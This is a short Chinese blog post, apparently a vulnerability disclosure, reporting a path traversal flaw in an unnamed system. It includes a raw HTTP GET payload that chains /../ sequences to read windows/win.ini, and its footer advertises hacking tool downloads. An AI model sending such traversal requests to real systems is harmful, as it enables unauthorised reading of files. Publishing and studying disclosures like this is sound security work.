某系统存在路径遍历漏洞

admin V管理员 /2024年 /0 评论 /63 阅读

0926

此篇文章发布距今已超过58天，您需要注意文章的内容或图片是否可用！

我深怕自己本非美玉，故而不敢加以刻苦琢磨，却又半信自己是块美玉，故又不肯庸庸碌碌，与瓦砥为伍。

漏洞描述

某系统中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件。

访问漏洞url：

构造payload，发送请求包读取文件

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: xxx

漏洞证明：

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

推荐站内搜索：最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……

宙飒天下网